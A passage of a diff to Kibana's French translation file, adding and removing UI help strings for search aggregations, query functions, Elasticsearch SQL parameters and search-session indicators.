"data.search.aggs.buckets.filter.filter.help": "Pour filtrer les résultats en fonction d’une requête KQL ou Lucene. Ne pas utiliser en association avec geo_bounding_box.", + "data.search.aggs.buckets.filter.filter.help": "Pour filtrer les résultats en fonction d’une requête KQL ou Lucene. Ne pas utiliser en association avec geo_bounding_box.", "data.search.aggs.buckets.filter.geoBoundingBox.help": "Pour filtrer les résultats en fonction d’une localisation au sein d’une zone de délimitation", "data.search.aggs.buckets.filter.id.help": "ID pour cette agrégation", "data.search.aggs.buckets.filter.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", @@ -2236,18 +1354,17 @@ "data.search.aggs.buckets.ipRange.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.ipRange.field.help": "Champ à utiliser pour cette agrégation", "data.search.aggs.buckets.ipRange.id.help": "ID pour cette agrégation", - "data.search.aggs.buckets.ipRange.ipRangeType.help": "Type de plage d'IP à utiliser pour cette agrégation. Doit être l’une des valeurs suivantes : mask, fromTo.", + "data.search.aggs.buckets.ipRange.ipRangeType.help": "Type de plage d'IP à utiliser pour cette agrégation. Doit être l’une des valeurs suivantes : mask, fromTo.", "data.search.aggs.buckets.ipRange.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.buckets.ipRange.ranges.help": "Plages à utiliser pour cette agrégation.", "data.search.aggs.buckets.ipRange.schema.help": "Schéma à utiliser pour cette agrégation", - "data.search.aggs.buckets.ipRangeLabel": "Plages d'IP de {fieldName}", "data.search.aggs.buckets.ipRangeTitle": "Plage d'IP", "data.search.aggs.buckets.multiTerms.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.multiTerms.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.multiTerms.fields.help": "Champs à utiliser pour cette agrégation", "data.search.aggs.buckets.multiTerms.id.help": "ID pour cette agrégation", "data.search.aggs.buckets.multiTerms.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", - "data.search.aggs.buckets.multiTerms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", + "data.search.aggs.buckets.multiTerms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", "data.search.aggs.buckets.multiTerms.orderAgg.help": "Configuration d'agrégation à utiliser pour ordonner les résultats", "data.search.aggs.buckets.multiTerms.orderBy.help": "Champ selon lequel ordonner les résultats", "data.search.aggs.buckets.multiTerms.otherBucket.help": "Lorsqu'il est défini sur ''vrai'', ce paramètre regroupe tous les compartiments au-delà de la taille autorisée.", @@ -2277,7 +1394,7 @@ "data.search.aggs.buckets.sampler.shardSize.help": "Le paramètre shard_size limite le nombre de documents les mieux classés recueillis dans l'échantillon traité sur chaque partition.", "data.search.aggs.buckets.samplerTitle": "Échantillonneur", "data.search.aggs.buckets.shardDelay.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", - "data.search.aggs.buckets.shardDelay.delay.help": "Délai entre les partitions à traiter. Exemple : \"5s\".", + "data.search.aggs.buckets.shardDelay.delay.help": "Délai entre les partitions à traiter. Exemple : \"5s\".", "data.search.aggs.buckets.shardDelay.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.shardDelay.id.help": "ID pour cette agrégation", "data.search.aggs.buckets.shardDelay.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", @@ -2293,7 +1410,6 @@ "data.search.aggs.buckets.significantTerms.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.buckets.significantTerms.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.buckets.significantTerms.size.help": "Nombre maximal de compartiments à extraire", - "data.search.aggs.buckets.significantTermsLabel": "Top {size} des termes les plus inhabituels pour {fieldName}", "data.search.aggs.buckets.significantTermsTitle": "Termes importants", "data.search.aggs.buckets.significantText.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.significantText.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2308,21 +1424,22 @@ "data.search.aggs.buckets.significantText.minDocCount.help": "Renvoyer des termes dont la correspondance est supérieure à un nombre configuré", "data.search.aggs.buckets.significantText.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.buckets.significantText.size.help": "Nombre maximal de compartiments à extraire", - "data.search.aggs.buckets.significantTextLabel": "Top {size} des termes les plus inhabituels pour \"{fieldName}\"", "data.search.aggs.buckets.significantTextTitle": "Texte important", "data.search.aggs.buckets.terms.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.terms.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.terms.exclude.help": "Valeurs de compartiment spécifiques à exclure des résultats", + "data.search.aggs.buckets.terms.excludeIsRegex.help": "Lorsque l’option est définie sur vrai, la propriété d'exclusion est traitée comme une expression régulière.", "data.search.aggs.buckets.terms.excludeLabel": "Exclure", "data.search.aggs.buckets.terms.field.help": "Champ à utiliser pour cette agrégation", "data.search.aggs.buckets.terms.id.help": "ID pour cette agrégation", "data.search.aggs.buckets.terms.include.help": "Valeurs de compartiment spécifiques à inclure dans les résultats", + "data.search.aggs.buckets.terms.includeIsRegex.help": "Lorsque l’option est définie sur vrai, la propriété d’inclusion est traitée comme une expression régulière.", "data.search.aggs.buckets.terms.includeLabel": "Inclure", "data.search.aggs.buckets.terms.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.buckets.terms.missingBucket.help": "Lorsqu'il est défini sur ''vrai'', ce paramètre regroupe tous les compartiments avec des champs manquants.", "data.search.aggs.buckets.terms.missingBucketLabel": "Manquant", "data.search.aggs.buckets.terms.missingBucketLabel.help": "Étiquette par défaut utilisée dans les graphiques lorsqu'il manque un champ aux documents.", - "data.search.aggs.buckets.terms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", + "data.search.aggs.buckets.terms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", "data.search.aggs.buckets.terms.orderAgg.help": "Configuration d'agrégation à utiliser pour ordonner les résultats", "data.search.aggs.buckets.terms.orderAscendingTitle": "Croissant", "data.search.aggs.buckets.terms.orderBy.help": "Champ selon lequel ordonner les résultats", @@ -2336,7 +1453,6 @@ "data.search.aggs.buckets.terms.shardSize.help": "Nombre de termes à évaluer lors de l'agrégation.", "data.search.aggs.buckets.terms.size.help": "Nombre maximal de compartiments à extraire", "data.search.aggs.buckets.termsTitle": "Termes", - "data.search.aggs.error.aggNotFound": "Aucun type d'agrégation enregistré pour \"{type}\".", "data.search.aggs.function.buckets.dateHistogram.help": "Génère une configuration d'agrégation en série pour une agrégation Histogramme.", "data.search.aggs.function.buckets.dateRange.help": "Génère une configuration d'agrégation en série pour une agrégation Plage de dates.", "data.search.aggs.function.buckets.diversifiedSampler.help": "Génère une configuration d'agrégation en série pour une agrégation Échantillonneur diversifié.", @@ -2374,13 +1490,14 @@ "data.search.aggs.function.metrics.percentiles.help": "Génère une configuration d'agrégation en série pour une agrégation Centiles.", "data.search.aggs.function.metrics.serial_diff.help": "Génère une configuration d'agrégation en série pour une agrégation Différenciation en série.", "data.search.aggs.function.metrics.singlePercentile.help": "Génère une configuration d'agrégation en série pour une agrégation Centile unique.", + "data.search.aggs.function.metrics.singlePercentileRank.help": "Génère une configuration d'agrégation en série pour une agrégation de rang Centile unique.", "data.search.aggs.function.metrics.std_deviation.help": "Génère une configuration d'agrégation en série pour une agrégation Écart-type.", "data.search.aggs.function.metrics.sum.help": "Génère une configuration d'agrégation en série pour une agrégation Somme.", "data.search.aggs.function.metrics.top_hit.help": "Génère une configuration d'agrégation en série pour une agrégation Meilleur résultat.", "data.search.aggs.function.metrics.topMetrics.help": "Génère une configuration d'agrégation en série pour Principaux indicateurs.", + "data.search.aggs.function.metrics.valueCount.help": "Génère une configuration d'agrégation en série pour une agrégation Décompte de valeurs.", "data.search.aggs.histogram.missingMaxMinValuesWarning": "Impossible d’extraire les valeurs max. et min. pour scaler automatiquement les compartiments de l'histogramme. Cela peut entraîner des performances de visualisation médiocres.", "data.search.aggs.metrics.averageBucketTitle": "Moyenne compartiment", - "data.search.aggs.metrics.averageLabel": "Moyenne {field}", "data.search.aggs.metrics.averageTitle": "Moyenne", "data.search.aggs.metrics.avg.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.avg.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2480,7 +1597,6 @@ "data.search.aggs.metrics.max.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.max.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.metrics.maxBucketTitle": "Max. compartiment", - "data.search.aggs.metrics.maxLabel": "Max. {field}", "data.search.aggs.metrics.maxTitle": "Max.", "data.search.aggs.metrics.median.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.median.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2488,7 +1604,6 @@ "data.search.aggs.metrics.median.id.help": "ID pour cette agrégation", "data.search.aggs.metrics.median.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.median.schema.help": "Schéma à utiliser pour cette agrégation", - "data.search.aggs.metrics.medianLabel": "Médiane {field}", "data.search.aggs.metrics.medianTitle": "Médiane", "data.search.aggs.metrics.metricAggregationsSubtypeTitle": "Agrégations d'indicateurs", "data.search.aggs.metrics.min.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", @@ -2498,7 +1613,6 @@ "data.search.aggs.metrics.min.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.min.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.metrics.minBucketTitle": "Min. compartiment", - "data.search.aggs.metrics.minLabel": "Min. {field}", "data.search.aggs.metrics.minTitle": "Min.", "data.search.aggs.metrics.moving_avg.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.moving_avg.customMetric.help": "Configuration d'agrégation à utiliser pour la conception d'agrégations de pipelines parents", @@ -2523,8 +1637,6 @@ "data.search.aggs.metrics.percentile_ranks.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.percentile_ranks.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.metrics.percentile_ranks.values.help": "Plage de rangs centiles", - "data.search.aggs.metrics.percentileRanks.valuePropsLabel": "Rang centile {format} de \"{label}\"", - "data.search.aggs.metrics.percentileRanksLabel": "Rangs centiles de {field}", "data.search.aggs.metrics.percentileRanksTitle": "Rangs centiles", "data.search.aggs.metrics.percentiles.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.percentiles.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2533,8 +1645,6 @@ "data.search.aggs.metrics.percentiles.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.percentiles.percents.help": "Plage de rangs centiles", "data.search.aggs.metrics.percentiles.schema.help": "Schéma à utiliser pour cette agrégation", - "data.search.aggs.metrics.percentiles.valuePropsLabel": "{percentile} centile de {label}", - "data.search.aggs.metrics.percentilesLabel": "Centiles de {field}", "data.search.aggs.metrics.percentilesTitle": "Centiles", "data.search.aggs.metrics.serial_diff.buckets_path.help": "Chemin d’accès à l'indicateur d’intérêt", "data.search.aggs.metrics.serial_diff.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", @@ -2554,12 +1664,15 @@ "data.search.aggs.metrics.singlePercentile.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.singlePercentile.percentile.help": "Centile à récupérer", "data.search.aggs.metrics.singlePercentile.schema.help": "Schéma à utiliser pour cette agrégation", - "data.search.aggs.metrics.singlePercentileLabel": "Centile {field}", + "data.search.aggs.metrics.singlePercentileRank.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", + "data.search.aggs.metrics.singlePercentileRank.enabled.help": "Spécifie si cette agrégation doit être activée.", + "data.search.aggs.metrics.singlePercentileRank.field.help": "Champ à utiliser pour cette agrégation", + "data.search.aggs.metrics.singlePercentileRank.id.help": "ID pour cette agrégation", + "data.search.aggs.metrics.singlePercentileRank.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", + "data.search.aggs.metrics.singlePercentileRank.schema.help": "Schéma à utiliser pour cette agrégation", + "data.search.aggs.metrics.singlePercentileRank.value.help": "Valeur de rang centile à récupérer", + "data.search.aggs.metrics.singlePercentileRankTitle": "Rang centile", "data.search.aggs.metrics.singlePercentileTitle": "Centile", - "data.search.aggs.metrics.standardDeviation.keyDetailsLabel": "Écart-type de {fieldDisplayName}", - "data.search.aggs.metrics.standardDeviation.lowerKeyDetailsTitle": "{label} inférieur", - "data.search.aggs.metrics.standardDeviation.upperKeyDetailsTitle": "{label} supérieur", - "data.search.aggs.metrics.standardDeviationLabel": "Écart-type de {field}", "data.search.aggs.metrics.standardDeviationTitle": "Écart-type", "data.search.aggs.metrics.std_deviation.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.std_deviation.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2567,6 +1680,7 @@ "data.search.aggs.metrics.std_deviation.id.help": "ID pour cette agrégation", "data.search.aggs.metrics.std_deviation.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.std_deviation.schema.help": "Schéma à utiliser pour cette agrégation", + "data.search.aggs.metrics.std_deviation.showBounds.help": "Spécifie si cette agrégation doit renvoyer les limites supérieure et inférieure ou l'écart-type lui-même.", "data.search.aggs.metrics.sum.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.sum.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.metrics.sum.field.help": "Champ à utiliser pour cette agrégation", @@ -2574,9 +1688,8 @@ "data.search.aggs.metrics.sum.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.metrics.sum.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.metrics.sumBucketTitle": "Somme compartiment", - "data.search.aggs.metrics.sumLabel": "Somme de {field}", "data.search.aggs.metrics.sumTitle": "Somme", - "data.search.aggs.metrics.timeShift.help": "Décalez la plage temporelle de l'indicateur d'une durée définie, par exemple 1 h ou 7 j. \"précédent\" utilisera la plage temporelle la plus proche du filtre d'histogramme de date ou de plage temporelle.", + "data.search.aggs.metrics.timeShift.help": "Décalez la plage temporelle de l'indicateur d'une durée définie, par exemple 1 h ou 7 j. \"précédent\" utilisera la plage temporelle la plus proche du filtre d'histogramme de date ou de plage temporelle.", "data.search.aggs.metrics.top_hit.aggregate.help": "Agréger le type", "data.search.aggs.metrics.top_hit.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.top_hit.enabled.help": "Spécifie si cette agrégation doit être activée.", @@ -2586,7 +1699,7 @@ "data.search.aggs.metrics.top_hit.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.metrics.top_hit.size.help": "Nombre maximal de compartiments à extraire", "data.search.aggs.metrics.top_hit.sortField.help": "Champ selon lequel ordonner les résultats", - "data.search.aggs.metrics.top_hit.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", + "data.search.aggs.metrics.top_hit.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", "data.search.aggs.metrics.topHit.ascendingLabel": "Croissant", "data.search.aggs.metrics.topHit.averageLabel": "Moyenne", "data.search.aggs.metrics.topHit.concatenateLabel": "Concaténer", @@ -2598,12 +1711,8 @@ "data.search.aggs.metrics.topHit.sumLabel": "Somme", "data.search.aggs.metrics.topHitTitle": "Meilleur résultat", "data.search.aggs.metrics.topMetrics.ascendingLabel": "Croissant", - "data.search.aggs.metrics.topMetrics.ascNoSizeLabel": "Première valeur \"{fieldName}\" par \"{sortField}\"", - "data.search.aggs.metrics.topMetrics.ascWithSizeLabel": "{size} premières valeurs \"{fieldName}\" par \"{sortField}\"", "data.search.aggs.metrics.topMetrics.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.metrics.topMetrics.descendingLabel": "Décroissant", - "data.search.aggs.metrics.topMetrics.descNoSizeLabel": "Dernière valeur \"{fieldName}\" par \"{sortField}\"", - "data.search.aggs.metrics.topMetrics.descWithSizeLabel": "{size} dernières valeurs \"{fieldName}\" par \"{sortField}\"", "data.search.aggs.metrics.topMetrics.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.metrics.topMetrics.field.help": "Champ à utiliser pour cette agrégation", "data.search.aggs.metrics.topMetrics.id.help": "ID pour cette agrégation", @@ -2611,23 +1720,24 @@ "data.search.aggs.metrics.topMetrics.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.metrics.topMetrics.size.help": "Nombre de valeurs principales à récupérer", "data.search.aggs.metrics.topMetrics.sortField.help": "Champ selon lequel ordonner les résultats", - "data.search.aggs.metrics.topMetrics.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", + "data.search.aggs.metrics.topMetrics.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", "data.search.aggs.metrics.topMetricsTitle": "Principaux indicateurs", - "data.search.aggs.metrics.uniqueCountLabel": "Décompte unique de {field}", "data.search.aggs.metrics.uniqueCountTitle": "Décompte unique", + "data.search.aggs.metrics.value_count.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", + "data.search.aggs.metrics.value_count.enabled.help": "Spécifie si cette agrégation doit être activée.", + "data.search.aggs.metrics.value_count.field.help": "Champ à utiliser pour cette agrégation", + "data.search.aggs.metrics.value_count.id.help": "ID pour cette agrégation", + "data.search.aggs.metrics.value_count.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", + "data.search.aggs.metrics.value_count.schema.help": "Schéma à utiliser pour cette agrégation", + "data.search.aggs.metrics.valueCountTitle": "Nombre de valeurs", "data.search.aggs.otherBucket.labelForMissingValuesLabel": "Étiquette pour des valeurs manquantes", "data.search.aggs.otherBucket.labelForOtherBucketLabel": "Étiquette pour autre compartiment", - "data.search.aggs.paramTypes.field.invalidSavedFieldParameterErrorMessage": "Le champ enregistré \"{fieldParameter}\" de la vue de données \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec l'agrégation \"{aggType}\". Veuillez sélectionner un nouveau champ.", - "data.search.aggs.paramTypes.field.notFoundSavedFieldParameterErrorMessage": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans la vue de données. Veuillez utiliser un autre champ.", - "data.search.aggs.paramTypes.field.requiredFieldParameterErrorMessage": "{fieldParameter} est un paramètre requis.", - "data.search.aggs.percentageOfLabel": "Pourcentage de {label}", - "data.search.aggs.rareTerms.aggTypesLabel": "Termes rares de {fieldName}", "data.search.aggs.string.customLabel": "Étiquette personnalisée", "data.search.dataRequest.title": "Données", "data.search.eql.field.help": "Liste de champs à récupérer", "data.search.eql.help": "Exécuter une requête Elasticsearch", "data.search.eql.index.help": "Index Elasticsearch à interroger", - "data.search.eql.q.help": "Requête DSL", + "data.search.eql.q.help": "Requête DSL", "data.search.eql.size.help": "Paramètre de taille de l’API de recherche d’Elasticsearch", "data.search.es_search.dataRequest.description": "Cette requête interroge Elasticsearch pour récupérer les données pour la visualisation.", "data.search.es_search.dataViewLabel": "Vue de données", @@ -2638,15 +1748,20 @@ "data.search.es_search.indexPatternDescription": "La vue de données qui se connecte aux index Elasticsearch.", "data.search.es_search.queryTimeDescription": "Le temps qu'il a fallu pour traiter la requête. Ne comprend pas le temps nécessaire pour envoyer la requête ni l'analyser dans le navigateur.", "data.search.es_search.queryTimeLabel": "Durée de la requête", - "data.search.es_search.queryTimeValue": "{queryTime} ms", "data.search.esaggs.error.kibanaRequest": "Une requête Kibana est nécessaire pour exécuter cette recherche sur le serveur. Veuillez fournir un objet de requête pour les paramètres d'exécution de l'expression.", "data.search.esdsl.help": "Exécuter une requête Elasticsearch", "data.search.esdsl.index.help": "Index Elasticsearch à interroger", - "data.search.esdsl.q.help": "Requête DSL", + "data.search.esdsl.q.help": "Requête DSL", "data.search.esdsl.size.help": "Paramètre de taille de l’API de recherche d’Elasticsearch", "data.search.esErrorTitle": "Impossible d’extraire les résultats de recherche", - "data.search.functions.cidr.cidr.help": "Spécifier le bloc CIDR", - "data.search.functions.cidr.help": "Créer une plage CIDR", + "data.search.essql.count.help": "Nombre de documents à récupérer. Pour de meilleures performances, utilisez un ensemble de données plus petit.", + "data.search.essql.help": "Interroge Elasticsearch avec Elasticsearch SQL.", + "data.search.essql.parameter.help": "Paramètre à transmettre à la requête SQL.", + "data.search.essql.query.help": "Requête Elasticsearch SQL.", + "data.search.essql.timeField.help": "Le champ temporel à utiliser dans le filtre de plage de temps défini dans le contexte.", + "data.search.essql.timezone.help": "Fuseau horaire à utiliser pour les opérations de date. Les formats ISO8601 et les décalages UTC valides fonctionnent.", + "data.search.functions.cidr.cidr.help": "Spécifier le bloc CIDR", + "data.search.functions.cidr.help": "Créer une plage CIDR", "data.search.functions.dateRange.from.help": "Spécifier la date de début", "data.search.functions.dateRange.help": "Créer une plage de dates", "data.search.functions.dateRange.to.help": "Spécifier la date de fin", @@ -2665,7 +1780,6 @@ "data.search.functions.field.name.help": "Nom du champ", "data.search.functions.field.script.help": "Script de champ, au cas où le champ serait scripté.", "data.search.functions.field.type.help": "Type du champ", - "data.search.functions.geoBoundingBox.arguments.error": "Au moins un des groupes de paramètres suivants doit être fourni : {parameters}.", "data.search.functions.geoBoundingBox.bottom_left.help": "Spécifier l’angle inférieur gauche", "data.search.functions.geoBoundingBox.bottom_right.help": "Spécifier l’angle inférieur droit", "data.search.functions.geoBoundingBox.bottom.help": "Spécifier la coordonnée inférieure", @@ -2695,9 +1809,9 @@ "data.search.functions.kibanaFilter.field.help": "Spécifier une recherche en texte libre esdsl", "data.search.functions.kibanaFilter.help": "Créer un filtre Kibana", "data.search.functions.kibanaFilter.negate.help": "Si le filtre doit être inversé", - "data.search.functions.kql.help": "Créer une requête KQL Kibana", - "data.search.functions.kql.q.help": "Spécifier une recherche en texte libre KQL Kibana", - "data.search.functions.lucene.help": "Créer une requête Lucene Kibana", + "data.search.functions.kql.help": "Créer une requête KQL Kibana", + "data.search.functions.kql.q.help": "Spécifier une recherche en texte libre KQL Kibana", + "data.search.functions.lucene.help": "Créer une requête Lucene Kibana", "data.search.functions.lucene.q.help": "Spécifier une recherche en texte libre Lucene", "data.search.functions.numericalRange.from.help": "Spécifier la valeur de début", "data.search.functions.numericalRange.help": "Créer une plage numérique", @@ -2722,11 +1836,11 @@ "data.search.functions.removeFilter.from.help": "Supprime uniquement les filtres appartenant à l'ID fourni", "data.search.functions.removeFilter.group.help": "Supprime uniquement les filtres appartenant au groupe fourni", "data.search.functions.removeFilter.help": "Supprime les filtres du contexte", - "data.search.functions.removeFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être retirés ?", + "data.search.functions.removeFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être retirés ?", "data.search.functions.selectFilter.from.help": "Sélectionnez uniquement les filtres appartenant à l'ID fourni", "data.search.functions.selectFilter.group.help": "Sélectionnez uniquement les filtres appartenant au groupe fourni", "data.search.functions.selectFilter.help": "Sélectionne les filtres du contexte", - "data.search.functions.selectFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être inclus ?", + "data.search.functions.selectFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être inclus ?", "data.search.functions.timerange.from.help": "Spécifier la date de début", "data.search.functions.timerange.help": "Créer une plage temporelle Kibana", "data.search.functions.timerange.mode.help": "Spécifier le mode (absolu ou relatif)", @@ -2738,7 +1852,6 @@ "data.search.searchSource.fetch.requestTimedOutNotificationMessage": "Les données peuvent être incomplètes parce que votre requête est arrivée à échéance.", "data.search.searchSource.fetch.shardsFailedModal.close": "Fermer", "data.search.searchSource.fetch.shardsFailedModal.copyToClipboard": "Copier la réponse dans le presse-papiers", - "data.search.searchSource.fetch.shardsFailedModal.failureHeader": "{failureName} à {failureDetails}", "data.search.searchSource.fetch.shardsFailedModal.showDetails": "Afficher les détails", "data.search.searchSource.fetch.shardsFailedModal.tabHeaderRequest": "Requête", "data.search.searchSource.fetch.shardsFailedModal.tabHeaderResponse": "Réponse", @@ -2747,30 +1860,19 @@ "data.search.searchSource.fetch.shardsFailedModal.tableColNode": "Nœud", "data.search.searchSource.fetch.shardsFailedModal.tableColReason": "Raison", "data.search.searchSource.fetch.shardsFailedModal.tableColShard": "Partition", - "data.search.searchSource.fetch.shardsFailedModal.tableRowCollapse": "Réduire {rowDescription}", - "data.search.searchSource.fetch.shardsFailedModal.tableRowExpand": "Développer {rowDescription}", "data.search.searchSource.fetch.shardsFailedNotificationDescription": "Les données que vous consultez peuvent être incomplètes ou erronées.", - "data.search.searchSource.fetch.shardsFailedNotificationMessage": "Échec de {shardsFailed} partitions sur {shardsTotal}", "data.search.searchSource.hitsDescription": "Le nombre de documents renvoyés par la requête.", "data.search.searchSource.hitsLabel": "Résultats", "data.search.searchSource.hitsTotalDescription": "Le nombre de documents correspondant à la requête.", "data.search.searchSource.hitsTotalLabel": "Résultats (total)", - "data.search.searchSource.indexPatternIdDescription": "L'ID dans l'index {kibanaIndexPattern}.", + "data.search.searchSource.indexFilterDescription": "Le modèle d'indexation actif.", + "data.search.searchSource.indexFilterLabel": "Modèle d'indexation", "data.search.searchSource.queryTimeDescription": "Le temps qu'il a fallu pour traiter la requête. Ne comprend pas le temps nécessaire pour envoyer la requête ni l'analyser dans le navigateur.", "data.search.searchSource.queryTimeLabel": "Durée de la requête", - "data.search.searchSource.queryTimeValue": "{queryTime} ms", "data.search.searchSource.requestTimeDescription": "Durée de la requête depuis le navigateur jusqu’à Elasticsearch et retour. N’inclut pas le temps d’attente de la requête dans la file.", "data.search.searchSource.requestTimeLabel": "Durée de la requête", - "data.search.searchSource.requestTimeValue": "{requestTime} ms", - "data.search.statusError": "Recherche terminée avec un statut {errorCode}", - "data.search.statusThrow": "Le statut de la recherche a généré un statut d'erreur {message} ({errorCode})", - "data.search.timeBuckets.dayLabel": "{amount, plural, one {un jour} other {# jours}}", - "data.search.timeBuckets.hourLabel": "{amount, plural, one {une heure} other {# heures}}", "data.search.timeBuckets.infinityLabel": "Plus d'une année", - "data.search.timeBuckets.millisecondLabel": "{amount, plural, one {une milliseconde} other {# millisecondes}}", - "data.search.timeBuckets.minuteLabel": "{amount, plural, one {une minute} other {# minutes}}", "data.search.timeBuckets.monthLabel": "un mois", - "data.search.timeBuckets.secondLabel": "{amount, plural, one {une seconde} other {# secondes}}", "data.search.timeBuckets.yearLabel": "une année", "data.search.timeoutContactAdmin": "Votre requête a expiré. Contactez l'administrateur système pour accroître le temps d'exécution.", "data.search.timeoutIncreaseSetting": "Votre requête a expiré. Augmentez le temps d'exécution en utilisant le paramètre avancé de délai d'expiration de la recherche.", @@ -2781,7 +1883,6 @@ "data.searchSessionIndicator.canceledIconAriaLabel": "La session de recherche s'est arrêtée", "data.searchSessionIndicator.canceledTitleText": "La session de recherche s'est arrêtée", "data.searchSessionIndicator.canceledTooltipText": "La session de recherche s'est arrêtée", - "data.searchSessionIndicator.canceledWhenText": "Arrêtée {when}", "data.searchSessionIndicator.continueInBackgroundButtonText": "Enregistrer la session", "data.searchSessionIndicator.disabledDueToDisabledGloballyMessage": "Vous ne disposez pas d'autorisations pour gérer les sessions de recherche", "data.searchSessionIndicator.disabledDueToTimeoutMessage": "Les résultats de la session de recherche ont expiré.", @@ -2789,28 +1890,23 @@ "data.searchSessionIndicator.loadingInTheBackgroundIconAriaLabel": "Session enregistrée en cours", "data.searchSessionIndicator.loadingInTheBackgroundIconTooltipText": "Session enregistrée en cours", "data.searchSessionIndicator.loadingInTheBackgroundTitleText": "Session enregistrée en cours", - "data.searchSessionIndicator.loadingInTheBackgroundWhenText": "Débuté {when}", "data.searchSessionIndicator.loadingResultsDescription": "Enregistrer votre session, poursuivre votre travail et retourner aux résultats terminés", "data.searchSessionIndicator.loadingResultsIconAriaLabel": "Chargement de la session de recherche", "data.searchSessionIndicator.loadingResultsIconTooltipText": "Chargement de la session de recherche", "data.searchSessionIndicator.loadingResultsTitle": "Votre recherche prend un certain temps…", - "data.searchSessionIndicator.loadingResultsWhenText": "Débuté {when}", "data.searchSessionIndicator.noCapability": "Vous n'êtes pas autorisé à créer des sessions de recherche.", "data.searchSessionIndicator.restoredDescriptionText": "Vous affichez des données mises en cache d'une plage temporelle spécifique. La modification de la plage temporelle ou des filtres entraînera la réexécution de la session", "data.searchSessionIndicator.restoredResultsIconAriaLabel": "Session enregistrée restaurée", "data.searchSessionIndicator.restoredResultsTooltipText": "Session de recherche restaurée", "data.searchSessionIndicator.restoredTitleText": "Session de recherche restaurée", - "data.searchSessionIndicator.restoredWhenText": "Terminé {when}", "data.searchSessionIndicator.resultLoadedInTheBackgroundDescriptionText": "Vous pouvez retourner à ces résultats à partir de la page de gestion", "data.searchSessionIndicator.resultLoadedInTheBackgroundIconAriaLabel": "Session enregistrée terminée", "data.searchSessionIndicator.resultLoadedInTheBackgroundIconTooltipText": "Session enregistrée terminée", "data.searchSessionIndicator.resultLoadedInTheBackgroundTitleText": "Session de recherche enregistrée", - "data.searchSessionIndicator.resultLoadedInTheBackgroundWhenText": "Terminé {when}", "data.searchSessionIndicator.resultsLoadedDescriptionText": 